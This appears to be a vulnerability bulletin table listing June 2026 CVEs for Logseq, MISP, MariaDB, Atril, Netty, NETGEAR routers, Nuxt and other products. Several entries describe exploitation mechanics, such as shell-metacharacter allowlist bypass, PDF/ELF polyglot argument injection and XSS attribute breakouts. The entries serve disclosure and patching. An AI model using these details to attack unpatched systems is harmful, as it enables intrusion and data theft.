| logseq--logseq | The Electron preload script in Logseq exposes an API method that allows the renderer process to invoke IPC handlers without proper path validation. An attacker with JavaScript execution in the renderer (e.g. via XSS or a malicious plugin) can read, write, or delete arbitrary files on the user's system. While only version v0.10.15 was tested and confirmed as vulnerable, the status of other versions is unknown since this issue was not addressed by a patch. | 2026-06-09 | not yet calculated | CVE-2026-47899 |
| logseq--logseq | Logseq is vulnerable to a stored cross-site scripting (XSS). A malicious plugin can include a JavaScript payload in the "name" field of its "package.json" file, which is rendered using "innerHTML" without proper sanitization, allowing the execution of arbitrary code in the privileged host context. While only version v0.10.15 was tested and confirmed as vulnerable, status of other versions is unknown since this issue was not addressed by a patch. | 2026-06-09 | not yet calculated | CVE-2026-47900 |
| logseq--logseq | Logseq is vulnerable to a sandbox escape flaw where plugins running in sandboxed iframes can inject arbitrary HTML attributes, such as event handlers, into their container element in the host DOM. Due to a disabled Content Security Policy (CSP), this allows a malicious plugin to execute arbitrary JavaScript in the privileged host context, potentially gaining unauthorized access to filesystem APIs. While only version v0.10.15 was tested and confirmed as vulnerable, status of other versions is unknown since this issue was not addressed by a patch. | 2026-06-09 | not yet calculated | CVE-2026-47901 |
| logseq--logseq | Logseq exposes an IPC handler that allows the renderer process to execute shell commands. While an allowlist restricts the command name (e.g. `git`, `pandoc`, `grep`), the argument string is concatenated with the command and passed to `child_process.spawn` with the `shell: true` option, allowing shell metacharacters in the arguments to bypass the allowlist. An attacker with JavaScript execution in the renderer (e.g. via XSS or a malicious plugin) can execute arbitrary shell commands with the privileges of the Logseq process, leading to remote code execution on the host. While only version v0.10.15 was tested and confirmed as vulnerable, status of other versions is unknown since this issue was not addressed by a patch. | 2026-06-09 | not yet calculated | CVE-2026-9279 |
| malach-it--boruta-server | Boruta is a standalone authorization server that aims to implement OAuth 2.0 and OpenID Connect up to decentralized identity specifications. Prior to version 0.9.1, Boruta session cookies and the identity "remember me" cookie were set without the Secure attribute. In deployments where users could reach the same Boruta origin over plaintext HTTP, browsers could send these cookies over an unencrypted connection. An attacker able to observe or intercept that network traffic could recover a valid session or remember-me cookie and reuse it to impersonate the affected user. Affected components include boruta_web, boruta_identity, and boruta_admin. The affected cookies include the shared session cookie, defaulting to `_boruta_web_key`, and the identity remember-me cookie, defaulting to `_boruta_identity_web_user_remember_me`. The issue is fixed in commit 18691c655164635066aa113003a3cd87f6ed11cd, released as part of version 0.9.1. The patch sets `secure: true` and `same_site: "Lax"` on configured session cookies for boruta_web, boruta_identity, and boruta_admin, and sets `secure: true` on the identity remember-me cookie. Until upgrading to a release containing the fix: terminate or reject plaintext HTTP before requests reach Boruta; enforce HTTPS-only access at the reverse proxy or load balancer; enable HSTS for Boruta domains; if cookie exposure is suspected, rotate SECRET_KEY_BASE and BORUTA_SESSION_COOKIE_SIGNING_SALT, then require users to authenticate again. Upgrade to a version containing commit 18691c655164635066aa113003a3cd87f6ed11cd, or apply the patch manually. After deploying the fix, verify that Boruta session and remember-me cookies include the Secure attribute in browser developer tools or with an HTTP response inspection tool. | 2026-06-11 | not yet calculated | CVE-2026-53661 |
| Malwarebytes--EDR 1.0.11 | The utility functions used by Malwarebytes EDR 1.0.11 on Linux for calculating a cryptographic hash of data bytes truncate the hashed data if it exceeds 4GB. This leads to an integer wrap-around if the data is larger than the maximum unsigned integer value (32-bit). Attackers could create a colliding hash value for two different strings by attaching 4GB of data to a string that is less than 4GB in size. | 2026-06-09 | not yet calculated | CVE-2023-29146 |
| Malwarebytes--Malwarebytes | An issue was discovered in Malwarebytes 4.x and 5.x (and Nebula 2020-10-21 and later). A large number of Firefox preference files can cause the parser to ignore other browser configuration files, leading to a denial of service. | 2026-06-09 | not yet calculated | CVE-2023-43686 |
| Malwarebytes--Malwarebytes | An issue was discovered in Malwarebytes 4.x and 5.x (and Nebula 2020-10-21 and later). There is a Heap buffer overflow in various buffer encryption utilities. | 2026-06-09 | not yet calculated | CVE-2023-43688 |
| MariaDB--server | MariaDB server is a community developed fork of MySQL server. From versions 10.6.1 to before 10.6.26, 10.11.1 to before 10.11.17, 11.4.1 to before 11.4.11, 11.8.1 to before 11.8.7, and 12.3.1, MariaDB on Windows with the CONNECT engine installed and REST support enabled interpolated the table's HTTP attribute into the curl command line without proper sanitization. This allows the user to execute shell commands on the server. This issue has been patched in versions 10.6.26, 10.11.17, 11.4.11, 11.8.7, and 12.3.2. | 2026-06-12 | not yet calculated | CVE-2026-44170 |
| MariaDB--server | MariaDB server is a community developed fork of MySQL server. In versions 3.3.18 and 3.4.8, an application that was taking non-validated user input, escaping it with mysql_real_escape_string() and sending it to the database using text protocol and big5 character set was vulnerable to SQL injections, even though mysql_real_escape_string() was supposed to prevent them. This issue has been patched in versions 3.3.19 and 3.4.9. | 2026-06-12 | not yet calculated | CVE-2026-44172 |
| mate-desktop--atril | Atril Document Viewer is the default document reader of the MATE desktop environment for Linux. A single-click remote code execution vulnerability in versions prior to 1.26.3 and 1.28.4 allows an attacker to achieve arbitrary code execution as the user by tricking them into clicking a link inside a malicious PDF document. The PDF can be packaged as a polyglot file that is simultaneously a valid PDF and a valid ELF shared library, making the attack a single-file, single-click, configuration-independent RCE on stock atril installations. The root cause is `shell/ev-application.c:ev_spawn`, which builds a command line from attacker-controlled PDF link-destination fields without applying `g_shell_quote`. The cmdline is then handed to `g_app_info_create_from_commandline`, which shell-parses it back into argv, splitting any embedded `--gtk-module=PATH` into a separate argv element. GTK then `dlopen()`s the path during init, running any `__attribute__((constructor))` it finds. Versions 1.26.3 and 1.28.4 contain a patch for the issue. This is the same defect class as CVE-2023-51698 (CBT `--checkpoint-action` injection in `comics-document.c`, fixed in 1.6.2) but in a different code path (`shell/ev-application.c`) that the original patch did not touch. | 2026-06-10 | not yet calculated | CVE-2026-46529 |
| membraneframework--membrane_mp4_plugin | Allocation of Resources Without Limits or Throttling vulnerability in membraneframework membrane_mp4_plugin allows unauthenticated denial-of-service via BEAM atom table exhaustion. The MP4 box header parser converts each 4-byte box name to an atom using String.to_atom/1 without validation. 'Elixir.Membrane.MP4.Container.Header':parse_box_name/1 in lib/membrane_mp4/container/header.ex interns every box name encountered while 'Elixir.Membrane.MP4.Container.Header':parse/1 walks the input. BEAM atoms are never garbage-collected, so each unique attacker-controlled 4-byte name is a permanent allocation. A crafted MP4 of approximately 8 MB containing roughly 1.1 million boxes with distinct non-standard names exhausts the atom table (default ceiling around 1,048,576 atoms), aborting the entire BEAM node and taking down all applications running on it. This issue affects membrane_mp4_plugin from 0.3.0 before 0.36.7. | 2026-06-11 | not yet calculated | CVE-2026-53423 |
| misp--bsimvis | A stored cross-site scripting vulnerability existed in MISP BSimVis tag rendering code. Several client-side rendering paths interpolated tag names, collection names, entity identifiers, cluster names, and tag metadata directly into HTML, HTML attributes, inline JavaScript event handlers, and CSS style values without context-appropriate escaping. The patch adds shared escaping helpers for HTML, attributes, JavaScript strings, and CSS color validation, then applies them across tag badges, tooltips, context menus, cluster cards, autocomplete suggestions, and dynamically inserted tag cards. An attacker able to create or influence stored tag or metadata values could inject a crafted payload that is later rendered in another user's browser. Successful exploitation could execute arbitrary JavaScript in the victim's session when they view affected BSimVis pages, potentially allowing the attacker to perform actions as the victim, read data available to the victim, or alter displayed application content. This issue affects MISP bsimvis: through v0.2.0. | 2026-06-10 | not yet calculated | CVE-2026-53693 |
| misp--misp | An improper authorization vulnerability in MISP allowed an authenticated organization administrator to access or modify user settings belonging to site administrator accounts within the same organization. The affected access-control checks scoped administrative actions by organization membership but did not exclude higher-privileged site administrator users. As a result, an organization administrator could potentially view or alter site administrator user settings and related login profile information, crossing the intended privilege boundary between organization administration and site-wide administration. The patch hardens the ACL logic by excluding site administrator accounts from organization administrator-managed user sets, adding explicit authorization failure when a target user is not administrable, and ensuring user setting and login profile operations fail closed. | 2026-06-12 | not yet calculated | CVE-2026-54357 |
| misp--misp | An incorrect authorization vulnerability in MISP allows an organization administrator to target site administrator accounts belonging to the same organization through the administrative email functionality. The affected code restricted organization administrators to users within their own organization, but did not exclude accounts assigned a site administrator role from recipient queries. As a result, an organization administrator could perform privileged account-management actions, such as initiating a password reset workflow, against a higher-privileged site administrator account in the same organization. Successful exploitation may allow an authenticated organization administrator to interfere with or potentially take over a site administrator account, resulting in privilege escalation and full compromise of the MISP instance's confidentiality, integrity, and availability. Attack prerequisites: The attacker must be authenticated as an organization administrator in the same organization as a site administrator account. | 2026-06-12 | not yet calculated | CVE-2026-54358 |
| misp--misp | MISP contains an insecure default configuration in which the Security.check_sec_fetch_site_header control is disabled. When this setting is disabled, state-changing requests such as POST, PUT, or AJAX requests are not restricted based on the browser-provided Sec-Fetch-Site header. A remote unauthenticated attacker could craft a malicious web page that causes an authenticated MISP user's browser to issue cross-site requests to MISP automation endpoints. If successful, the forged requests may be processed with the privileges of the victim user, potentially allowing unauthorized modification of MISP data or configuration. Enabling Security.check_sec_fetch_site_header mitigates this issue, although operators of multi-homed MISP deployments should validate the setting before enforcing it. | 2026-06-12 | not yet calculated | CVE-2026-54359 |
| misp--misp | A mass assignment vulnerability exists in MISP's sharing group creation endpoint. When creating a new sharing group, the controller did not remove a user-supplied id field before saving the submitted data. In CakePHP, supplying a primary key in the save data can cause a create() followed by save() operation to update an existing record instead of creating a new one. An authenticated user with permission to add sharing groups could therefore submit the identifier of an existing sharing group and modify that sharing group without passing the normal edit access-control checks. This may allow the attacker to take over or alter sharing groups they do not otherwise have access to, potentially affecting the confidentiality and integrity of information shared through those groups. Affected component: app/Controller/SharingGroupsController.php, add() action | 2026-06-12 | not yet calculated | CVE-2026-54360 |
| misp--misp | MISP contained multiple mass assignment vulnerabilities in the handling of collections, tag collections, event delegations, and shadow attributes. Several controller actions accepted user-supplied fields that should have remained server-controlled, including record identifiers and ownership-related fields such as id, org_id, orgc_id, and user_id. An authenticated attacker with access to the affected endpoints could craft requests containing protected fields in order to alter object ownership, redirect an update to another record, overwrite existing event delegation requests, or modify shadow attribute proposals belonging to another organization. This could result in unauthorized modification of MISP objects and, depending on object visibility and sharing configuration, unauthorized access to or transfer of sensitive threat intelligence data. The issue was fixed by explicitly pinning ownership and identity fields to their stored values during edit operations and by removing user-supplied primary keys from create-only save paths. Affected components: * CollectionsController::edit() * EventDelegationsController::delegateEvent() * ShadowAttributesController::edit() * TagCollectionsController::edit() * TagCollectionsController::editWithTags() Attack requirements: The attacker must be authenticated and able to reach the affected MISP endpoints. No user interaction is required. | 2026-06-12 | not yet calculated | CVE-2026-54361 |
| misp--misp | An incorrect visibility condition in the MISP event template builder allowed authenticated non-site-admin users to view galaxies that should not have been visible to their organisation. The custom access-control condition intended to restrict galaxies to those owned by the user's organisation or distributed beyond it used a PHP comparison expression instead of a query condition. As a result, enabled galaxies, including organisation-only custom galaxies belonging to other organisations, could be exposed in the template builder galaxy list. This could disclose metadata about private galaxy definitions to unauthorised users. | 2026-06-12 | not yet calculated | CVE-2026-54362 |
| misp--misp | A stored cross-site scripting vulnerability exists in MISP when the Overmind theme is used. The setHomePage endpoint previously saved the user-controlled path value through setSettingInternal(), bypassing the normal setSetting() validation logic, including validate_homepage, which requires homepage paths to start with /. As a result, an authenticated user could store an arbitrary homepage value, including an XSS payload. The stored value was later rendered in app/View/News/index.ctp as the href attribute of the "Continue to homepage" link without HTML escaping. This could allow execution of attacker-controlled JavaScript in the browser context of the affected MISP instance when the crafted homepage link is rendered and interacted with. The issue is fixed by always persisting the homepage setting through setSetting(), ensuring validation and access checks are applied, and by HTML-escaping the homepage value before rendering it in the news view. | 2026-06-12 | not yet calculated | CVE-2026-54393 |
| misp--misp | MISP contains a path traversal vulnerability in OrganisationsController::getOrgLogo. The vulnerable code builds organisation logo file paths using organisation-controlled fields such as id, name, and uuid without ensuring that the resolved file remains inside the intended APP/files/img/orgs/ directory. An attacker able to influence an organisation field, for example the organisation name, could use path traversal sequences to cause MISP to return arbitrary readable .png or .svg files from outside the organisation logo directory. The issue is fixed by resolving candidate paths with realpath() and verifying that they remain under the expected base directory before serving the file. | 2026-06-12 | not yet calculated | CVE-2026-54394 |
| misp--misp | MISP contains a reflected cross-site scripting vulnerability in the UiBeta event index view. The urlparams value is inserted into an inline JavaScript handler using HTML escaping inside a single-quoted JavaScript string. Because browsers HTML-decode attribute values before JavaScript parsing, a crafted searcheventinfo value can restore encoded quote characters and break out of the JavaScript string. An attacker could craft a malicious URL that, when opened by a victim using the UiBeta event index, executes arbitrary JavaScript in the victim's browser in the context of the MISP instance. The issue is fixed by encoding the value as a JavaScript string literal with json_encode() before applying HTML escaping at the attribute layer. | 2026-06-12 | not yet calculated | CVE-2026-54395 |
| misp--misp | An information disclosure vulnerability exists in the MISP AuthKey edit functionality. When a validation error occurs during an AuthKey edit request, the user dropdown was populated using the attacker-controlled AuthKey.user_id value from the submitted request data. An authenticated user with permission to edit an AuthKey could submit arbitrary user IDs and observe the returned dropdown data, allowing enumeration of user email addresses. The issue is fixed by deriving the dropdown user from the persisted AuthKey owner instead of the request body. | 2026-06-12 | not yet calculated | CVE-2026-54396 |
| misp--misp | A vulnerability in MISP's non-REST event editing path allowed an authenticated user with event edit permissions to manipulate the submitted form data and set an event's sharing_group_id to a sharing group they were not authorized to use. When distribution was set to sharing group distribution, the non-REST save path accepted the submitted sharing_group_id without performing the same sharing group authorization check enforced by the REST edit path. An attacker could exploit this by tampering with the event edit request and assigning an event to an undisclosed or unauthorized sharing group. This could result in unauthorized use of restricted sharing groups, disclosure of the sharing group name in event listings, and unintended modification of the event's distribution metadata. The issue is fixed by validating that the selected sharing group can be used by the current user when the sharing group is changed, and by clearing sharing_group_id when the event distribution is not set to sharing group distribution. | 2026-06-12 | not yet calculated | CVE-2026-54397 |
| misp--misp | An authorization flaw in MISP's object add/edit handling allowed an authenticated user with object editing permissions to assign a MISP object, or attributes contained within an object, to a sharing group that the user was not authorized to use or view. When editing objects, the sharing group validation was performed against the wrong request data structure after object fields had been merged to the top level, causing the check to be bypassed. In addition, attributes embedded in objects were not individually validated for authorized sharing group use. An attacker could craft a request with distribution set to 4 and an arbitrary sharing_group_id, potentially disclosing the existence or name of otherwise non-visible sharing groups and improperly modifying the distribution metadata of objects or contained attributes. | 2026-06-12 | not yet calculated | CVE-2026-54398 |
| Mobatek--MobaXterm Personal Edition (Portable) | MobaXterm Personal Edition (Portable), in its 26.3 version (Build 5154), allows arbitrary code execution by loading malicious DLLs from a temporary directory that is predictable and can be modified by the user. During startup, the application searches for specific DLLs in this location before resorting to the system's secure paths, enabling an attacker with local access to place a specially crafted DLL to be executed automatically when the victim launches the application. | 2026-06-12 | not yet calculated | CVE-2026-11879 |
| Mobatek--MobaXterm Personal Edition (Portable) | MobaXterm Personal Edition (Portable), in its 26.3 version (Build 5154), allows arbitrary code execution by loading a malicious DLL located in the same directory as the portable executable. Because the application automatically loads the winspool.drv library from that location during startup, an attacker with local access can place a specially crafted DLL alongside the executable to be executed when the victim launches the application. | 2026-06-12 | not yet calculated | CVE-2026-11967 |
| Moxa--UC-1200A Series | A Missing Required Cryptographic Step vulnerability has been identified in Moxa's embedded Linux firmware for industrial computers and controllers. This vulnerability represents an incomplete remediation of CVE-2026-0714. The firmware introduced TPM2 parameter encryption as a countermeasure against CVE-2026-0714. However, an omission in the authorization session configuration causes the parameter encryption to provide no effective protection. An attacker with invasive physical access to the device can still capture TPM communications on the SPI bus and derive the LUKS disk encryption key in plaintext. While successful exploitation results in full compromise of the encrypted disk volume, the attack requires invasive physical access, including opening the device and attaching external equipment to the SPI bus. Remote exploitation is not possible, and the attack does not affect any downstream systems. | 2026-06-12 | not yet calculated | CVE-2026-9266 |
| Mozilla--Focus for iOS | UXSS in Focus for iOS / Klar Webkit navigation. This vulnerability was fixed in Focus for iOS 151.3.1 and Klar for iOS 151.3.1. | 2026-06-09 | not yet calculated | CVE-2026-11799 |
| mvt-project--mvt | MVT (Mobile Verification Toolkit) helps with conducting forensics of mobile devices in order to find signs of a potential compromise. Prior to version 2026.5.12, there is a path traversal vulnerability via unsanitized File identifiers in iOS Backup processing. This issue has been patched in version 2026.5.12. | 2026-06-08 | not yet calculated | CVE-2026-46486 |
| Nemon--Nemon Trade Energy | SQL injection in the 'two_steps_auth_code' parameter processed by the 'twoStepsAuthVerification' function within the '/user-login' endpoint. The two-factor authentication (2FA) functionality can be accessed without prior authentication, allowing unauthenticated attackers to execute arbitrary SQL queries on the backend database. A successful exploit could lead to database enumeration, the unauthorised creation of privileged users, the modification or deletion of critical information, and denial-of-service conditions. | 2026-06-09 | not yet calculated | CVE-2026-10731 |
| NETGEAR--CAX30 | An unauthenticated user on the local network can gain control of the router and make unauthorized changes to its operation. | 2026-06-09 | not yet calculated | CVE-2026-9211 |
| NETGEAR--CBR750 | Insufficient configuration management in the listed devices allows authenticated administrators connected to the local network to tamper with the system. | 2026-06-09 | not yet calculated | CVE-2026-0418 |
| NETGEAR--EX3700 | Insufficient input validation vulnerability in the listed NETGEAR models allows authenticated administrators connected to the local network to make unauthorized modification of router software and functionality. | 2026-06-09 | not yet calculated | CVE-2026-9210 |
| NETGEAR--JR6150 | Insufficient input validation vulnerability in NETGEAR JR6150 (AC750 WiFi Router 802.11ac Dual Band Gigabit released in 2014) allows administrators connected to the local network to make unauthorized modification of router software and functionality. NETGEAR JR6150 reached End-of-Support status in 2018 and is no longer receiving security updates. NETGEAR strongly recommends replacing these devices with newer NETGEAR models to ensure continued security support and updates. This vulnerability has been identified through firmware emulation in a controlled research environment and has not been verified on production hardware. | 2026-06-09 | not yet calculated | CVE-2026-0412 |
| NETGEAR--JR6150 | Insufficient input validation in NETGEAR JR6150 (AC750 WiFi Router 802.11ac Dual Band Gigabit released in 2014) allows users connected to the local WiFi networks to execute operating system commands. NETGEAR JR6150 has reached End-of-Support phase as of 2018, and no further security updates are planned. NETGEAR strongly recommends replacing these devices with newer NETGEAR models to ensure continued security support and updates. This vulnerability has been identified through firmware emulation in a controlled research environment and has not been verified on production hardware. | 2026-06-09 | not yet calculated | CVE-2026-0419 |
| NETGEAR--LBR1020 | Insufficient authentication and input validation in the listed NETGEAR models allow users connected to the local network to execute commands impacting the product's confidentiality or change certain configurations. | 2026-06-09 | not yet calculated | CVE-2026-9212 |
| NETGEAR--MR60 | Insufficient input validation vulnerability in the listed NETGEAR devices allows authenticated administrators connected to the local network to tamper with the router's integrity. | 2026-06-09 | not yet calculated | CVE-2026-0417 |
| NETGEAR--MR70 | A vulnerability in the affected NETGEAR gaming routers allows attackers with the ability to intercept and tamper with traffic between the router and the Internet, to execute code on the device. | 2026-06-09 | not yet calculated | CVE-2026-9213 |
| NETGEAR--Orbi 370 | A NETGEAR security issue that could allow an attacker with the ability to intercept and tamper with traffic between the router and the Internet to run commands on your device when the device administrator performs certain specific management actions. This issue affects NETGEAR Orbi 370 series devices before V12.1.2.7. | 2026-06-09 | not yet calculated | CVE-2026-0409 |
| NETGEAR--R7000 | Authenticated administrators connected to the local network can gain elevated access to the router and make unauthorized changes to router software and functionality. | 2026-06-09 | not yet calculated | CVE-2026-0410 |
| NETGEAR--RAX120v1 | An improper implementation of TLS certificate validation vulnerability found in NETGEAR's ReadyCloud client app which could allow an attacker to perform attacker-in-the-middle (MiTM) style attacks impacting the product's confidentiality. This vulnerability affects the listed NETGEAR models. | 2026-06-09 | not yet calculated | CVE-2026-0420 |
| NETGEAR--RAXE450 | An insufficient input validation vulnerability in certain NETGEAR router models as listed allows an authenticated administrator with local network access to submit crafted input that bypasses intended management interface restrictions, resulting in unauthorized modification of protected router software or functionality. | 2026-06-09 | not yet calculated | CVE-2026-0416 |
| NETGEAR--RBE370 | A buffer overflow vulnerability due to insufficient input validation in the listed NETGEAR models allows authenticated administrators connected to the local network to make unauthorized modification of router software and functionality. | 2026-06-09 | not yet calculated | CVE-2026-0413 |
| NETGEAR--RBE970 | An information disclosure vulnerability in the NETGEAR Orbi satellites (RBR/RBE/RBS Series) could allow a user connected to your network to gain administrator access to the Orbi router. The listed NETGEAR models are affected by this vulnerability. Orbi WiFi Systems without satellite devices are not impacted by this issue. | 2026-06-09 | not yet calculated | CVE-2026-0411 |
| NETGEAR--RBE970 | Insufficient input validation vulnerability in the listed NETGEAR models allows authenticated administrators connected to the local network to make unauthorized modification of router software and functionality. | 2026-06-09 | not yet calculated | CVE-2026-0414 |
| NETGEAR--RBE970 | Insufficient input validation vulnerability in the listed NETGEAR models allows authenticated administrators connected to the local network to make unauthorized modification of router software and functionality. | 2026-06-09 | not yet calculated | CVE-2026-0415 |
| NETGEAR--RBR860 | Unauthenticated users on the local network can cause the router to become unavailable by sending specially crafted requests. | 2026-06-09 | not yet calculated | CVE-2026-3088 |
| netty--netty | Netty is a network application framework for development of protocol servers and clients. Prior to versions 4.1.135.Final and 4.2.15.Final, the RedisArrayAggregator handler permanently leaks pooled direct-memory buffers when a Redis pipeline connection closes before a RESP array aggregate completes. The handler retains child messages in per-handler state (`depths` field) but defines no `channelInactive`, `handlerRemoved`, or `exceptionCaught` method to release them when the pipeline tears down. Because the leaked buffers are slices of `PooledByteBufAllocator` chunks, they prevent those chunks from being returned to the JVM-wide direct-memory pool. Repeated connection churn by any network peer monotonically drains this shared pool, eventually causing allocation failures on all Netty channels in the process. Versions 4.1.135.Final and 4.2.15.Final patch the issue. | 2026-06-12 | not yet calculated | CVE-2026-48006 |
| netty--netty | Netty is a network application framework for development of protocol servers and clients. Prior to versions 4.1.135.Final and 4.2.15.Final, the HAProxy PROXY protocol v2 codec in netty leaks native or heap memory on every connection when a client sends a syntactically valid header containing nested `PP2_TYPE_SSL` TLVs (type-length-value records) at depth two or greater. The leak occurs on the successful parse path: no exception is thrown, the message fires downstream, the decoder removes itself, and the application releases the `HAProxyMessage` normally. Yet the underlying cumulation buffer (a pooled, potentially direct `ByteBuf` allocated by the channel) remains permanently pinned. Versions 4.1.135.Final and 4.2.15.Final patch the issue. | 2026-06-12 | not yet calculated | CVE-2026-48059 |
| netty--netty | Netty is a network application framework for development of protocol servers and clients. Prior to versions 4.1.135.Final and 4.2.15.Final, Netty HTTP/2 max header size handling produces an attack similar to HTTP/2 Rapid Reset. There is a setting in the http2 specification called `SETTINGS_MAX_HEADER_LIST_SIZE`. When a client sends that setting to Netty, it appears that Netty will behave as follows: read the request; proxy the request to the origin; attempt to produce a response; and create an exception while writing the headers for the response. Functionally, this should be similar to the http2 reset attack, but with a different on-the-wire signature. Versions 4.1.135.Final and 4.2.15.Final patch the issue. | 2026-06-12 | not yet calculated | CVE-2026-50560 |
| Neuron Soft--Golem OEE MES | Golem OEE MES is vulnerable to an unauthenticated path traversal flaw. This vulnerability allows an attacker in the same local network to read arbitrary files from the server's operating system by manipulating HTTP request paths. This issue has been fixed in version 11.6.0. | 2026-06-11 | not yet calculated | CVE-2026-8464 |
| ninenines--cowlib | Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Request/Response Splitting') vulnerability in ninenines cowlib allows HTTP response splitting via non-VCHAR bytes in structured-fields string values. cow_http_struct_hd:escape_string/2 in cowlib only escapes \ and ", passing all other bytes through verbatim. This creates an encoder/decoder asymmetry: the matching parser accepts only printable ASCII (0x20-0x7E, excluding " and \), but the encoder emits any byte including CR and LF. An application that builds a structured HTTP header via cow_http_struct_hd:item/1 (or a higher-level wrapper such as cow_http_hd:wt_protocol/1) from attacker-controlled input can have \r\n injected into the serialized header value. Once on the wire, the injected CRLF terminates the current header and any following bytes are interpreted as a new header, enabling HTTP response splitting. This issue affects cowlib from 2.9.0. | 2026-06-08 | not yet calculated | CVE-2026-43966 |
| ninenines--gun | Origin Validation Error vulnerability in ninenines gun (gun_http2 module) allows cross-origin cookie injection via unvalidated HTTP/2 PUSH_PROMISE authority. In gun_http2:push_promise_frame/7, the :authority pseudo-header from an incoming PUSH_PROMISE frame is stored verbatim into the promised stream record without checking that it matches the connection's origin. When gun_http2:headers_frame/9 later processes the response headers for the promised stream, it calls gun_cookies:set_cookie_header/7 with the unvalidated server-supplied authority before any status branching and before user code can act. This violates RFC 7540 §10.6 / RFC 9113 §8.4, which require receivers to treat as a protocol error any push for a resource the server is not authoritative for. A malicious or compromised HTTP/2 server can plant cookies scoped to arbitrary third-party domains into the client's shared cookie store. This enables session fixation attacks against those domains and, if the planted cookie overrides a legitimate session token, may result in account takeover. No user interaction beyond making a normal HTTP/2 request to the attacker-controlled server is required. This issue affects gun: from 2.0.0 before 2.4.0. | 2026-06-08 | not yet calculated | CVE-2026-43972 |
| ninenines--gun | Uncontrolled Resource Consumption vulnerability in ninenines gun (gun_http module) allows a malicious server to exhaust client memory via unbounded HTTP/1.1 response buffering. In gun_http:handle/5, three clauses accumulate incoming TCP data into the connection's buffer field using binary concatenation with no upper-bound check: the head clause appends data until the \r\n\r\n header terminator is found; the body_chunked clause appends data whenever cow_http_te:stream_chunked/2 returns a more result indicating an incomplete chunk boundary; and the body_trailer clause appends data until the trailing \r\n\r\n is found. In each case, when the expected terminator never arrives, the enlarged binary is stored back into state and the process waits for more data, with no configurable or hard-coded ceiling on buffer size. A malicious or compromised server can exploit this by sending a partial response that never completes. For example, a response may begin with HTTP/1.1 200 OK\r\nX-Pad: followed by an unbounded stream of arbitrary bytes, never sending the header terminator. The gun connection process will continuously append the incoming data to its buffer, causing unbounded heap growth. Because BEAM imposes no per-process heap limit by default, a single malicious connection can exhaust all available memory on the node, causing a node-wide out-of-memory crash. This issue affects gun: from 1.0.0 before 2.4.0. | 2026-06-08 | not yet calculated | CVE-2026-43973 |
| ninenines--gun | Unexpected Status Code or Return Value vulnerability in ninenines gun (gun_http module) allows a malicious HTTP server to force the client into raw protocol mode via an unsolicited 101 Switching Protocols response. In gun_http:handle_inform/8, when a 101 Switching Protocols response is received over HTTP/1.1, the function verifies only that the Upgrade header is syntactically valid and that the stream reference is a plain reference(). It does not check whether the client ever sent an Upgrade or Connection: upgrade header on the corresponding request. Because this check is absent, any 101 response (solicited or not) causes gun to dispatch a gun_upgrade message to the caller and transition the entire connection to raw protocol mode. A malicious or compromised HTTP server can send an unsolicited 101 response to any HTTP/1.1 request, causing the gun client to abandon HTTP framing for that connection. Once in raw mode, gun_raw applies no flow control (flow=infinity) and re-arms socket active mode after every received packet, so the server can flood the client with arbitrary bytes. These are forwarded as unbounded gun_data messages to the owner process, exhausting its mailbox and BEAM memory, ultimately crashing the VM. This issue affects gun: from 2.0.0 before 2.4.0. | 2026-06-08 | not yet calculated | CVE-2026-43974 |
| NLnet Labs--ldns | NLnet Labs ldns 1.2.0 up to and including version 1.9.0, when used in applications as a (stub) resolver over UDP, does not match the query destination address and port against the response source address and port. Furthermore, neither the query ID nor the question section of the query is matched against that of the response. This makes applications that use ldns for (stub) resolver functionality over UDP vulnerable to off-path poisoning attacks. The drill tool, which is shipped with ldns, suffers from this vulnerability. | 2026-06-10 | not yet calculated | CVE-2026-10846 |
| NLnet Labs--Routinator | Routinator exits on any error when accepting incoming HTTP or RTR connections, including ones it can recover from such as running out of file descriptors. This condition can be triggered maliciously by an attacker by opening a large number of connections to the HTTP or RTR server. This only affects users that make their HTTP or RTR server available to untrusted networks. | 2026-06-08 | not yet calculated | CVE-2026-49232 |
| NLnet Labs--Routinator | Routinator does not properly check the module component of rsync URIs, which are used to create the file system paths for the Routinator cache. This allows for path traversal by having a module name containing .., potentially providing an attacker access to the entire Routinator rsync cache. | 2026-06-08 | not yet calculated | CVE-2026-49233 |
| NLnet Labs--Routinator | When sending a specifically crafted non-UTF-8 string as select-asn query parameter to the /api/v1/origins endpoint, Routinator crashes. This only affects users who allow API access from untrusted networks. | 2026-06-08 | not yet calculated | CVE-2026-49234 |
| NLnet Labs--Routinator | When Routinator encounters a file via RRDP using a specifically crafted Document Type Definition, Routinator crashes. | 2026-06-08 | not yet calculated | CVE-2026-49235 |
| NoMachine--NoMachine | Improper Neutralization of Argument Delimiters in a Command ('Argument Injection') vulnerability in Nomachine allows Argument Injection. This issue affects Nomachine: before 9.5.7, before 8.23.2. | 2026-06-10 | not yet calculated | CVE-2026-53694 |
| nuxt--nuxt | Nuxt is an open-source web development framework for Vue.js. From versions 3.4.3 to before 3.21.6 and 4.0.0-alpha.1 to before 4.4.6, navigateTo() with external: true generates a server-side HTML redirect body containing a <meta http-equiv="refresh"> tag. The destination URL is only sanitized by replacing " with %22, leaving <, >, &, and ' unencoded. An attacker who can influence the URL passed to navigateTo(url, { external: true }) can break out of the content="…" attribute and inject arbitrary HTML/JavaScript that executes under the application's origin. This issue has been patched in versions 3.21.6 and 4.4.6. | 2026-06-12 | not yet calculated | CVE-2026-45669 |
| nuxt--nuxt | Nuxt is an open-source web development framework for Vue.js. In @nuxt/rspack-builder and @nuxt/webpack-builder versions 3.15.4 to before 3.21.6, and 4.0.0-alpha.1 to before 4.4.6, there is an incomplete fix for GHSA-4gf7-ff8x-hq99. Source code may be stolen during dev when using the webpack / rspack builder if the dev server is bound to a non-loopback address (e.g. nuxt dev --host) and the developer opens a malicious site on the same network. This issue has been patched in versions 3.21.6 and 4.4.6. | 2026-06-12 | not yet calculated | CVE-2026-45670 |
| nuxt--nuxt | Nuxt is an open-source web development framework for Vue.js. In Nuxt versions 3.1.0 to before 3.21.6 and 4.0.0-alpha.1 to before 4.4.6 and @nuxt/nitro-server versions 3.20.0 to before 3.21.6 and 4.0.0-alpha.1 to before 4.4.6, the /__nuxt_island/* endpoint accepts attacker-controlled props query/body parameters and renders any island component without verifying that the URL-resident hash (<Name>_<hashId>.json) was actually issued for those inputs by <NuxtIsland>. The hash is computed and embedded client-side but never validated server-side, so the same path can return materially different responses depending on the query. This issue has been patched in versions 3.21.6 and 4.4.6. | 2026-06-12 | not yet calculated | CVE-2026-46342 |
